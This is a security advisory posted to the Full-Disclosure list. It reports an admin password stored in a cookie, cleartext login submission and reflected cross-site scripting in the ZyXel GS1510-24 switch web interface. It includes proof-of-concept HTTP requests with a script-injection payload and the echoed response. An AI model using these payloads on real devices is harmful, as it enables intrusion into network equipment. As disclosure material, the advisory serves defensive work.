[Full-disclosure] Multiple vulnerabilities in ZyXel GS1510 web front end



*Advisory Information*

Title: Multiple vulnerabilities in ZyXel GS1510 web front end
Date published: 2012-03-14 12:57:15 AM
upSploit Ref: UPS-2011-0042

*Advisory Summary*

IT Security Geeks have discovered multiple vulnerabilities in the ZyXel
1510 24-port Ethernet switch, these include Admin password stored in
Cookie, reflected Cross-Site Scripting (XSS), and clear-text password
submission.

*Vendor*

Zyxel

*Affected Software*

V1.00(BVN.1)

This is the firmware that runs on the ZyXel model GS1510-24 switch.

*Description of Issue*

The GS1510-24 ZyXel switch, running firmware V1.00(BVN.1), is susceptible
to multiple vulnerabilities, these are all within the management web
interface, and are as follows:

1. The management web interface Cookie contains both the username and the
password for the Admin user to log into the switch.

2. Cleartext submission of password. The page contains a form with the
following action URL, which is submitted over clear-text HTTP:

http://192.168.1.5/webctrl.cgi

The form contains the following password field:

password

3. Cross Site Scripting

The payload fe07b</title><script>alert(xss)</ script>b7e71e54af6 was
submitted in the name of an arbitrarily supplied request parameter.

This input was echoed unmodified in the application’s response.

*PoC*

2. Cleartext submission of password.

http://192.168.1.5/webctrl.cgi

Request

GET /login.htm HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1)
AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cache-Control: max-age=0
SSSSSSS: UUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: admin=password123
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

3. Cross Site Scripting

The payload fe07b&lt;/title&gt;&lt;script&gt;alert(1)&lt;/
script&gt;b7e71e54af6 was submitted in the name of an arbitrarily supplied
request parameter.

This input was echoed unmodified in the application’s response.

This proof-of-concept attack demonstrates that it is possible to inject
arbitrary JavaScript into the application’s response.

Request

GET
/images/?fe07b&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;b7e71e54af6=1
HTTP/1.1 Host: 192.168.1.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection:
close
Cookie: admin=password123

Response

HTTP/1.1 200 OK
Server: thttpd/2.25b 29dec2003 Content-Type: text/html; charset=iso-8859-1
Date: Sun, 18 Sep 2011 16:30:14 GMT Last-Modified: Sat, 01 Jan 2000
00:00:03 GMT Accept-Ranges: bytes
Connection: close
&lt;HTML&gt;
&lt;HEAD&gt;&lt;TITLE&gt;Index of
/images/?fe07b&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;b7e71e54af6=1&lt;/TITLE&gt;&lt;/HEAD&gt;
&lt;BODY BGCOLOR=&quot;#99cc99&quot; TEXT=&quot;#000000&quot;
LINK=&quot;#2020ff&quot; VLINK=&quot;#4040cc&quot;&gt;
&lt;H2&gt;Index of /images/?fe
...[SNIP]...

*Credits*

Neil Fryer/IT Security Geeks

*References*

ZyXel GS1510

*Patch/Fix*

Update to the latest firmware
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages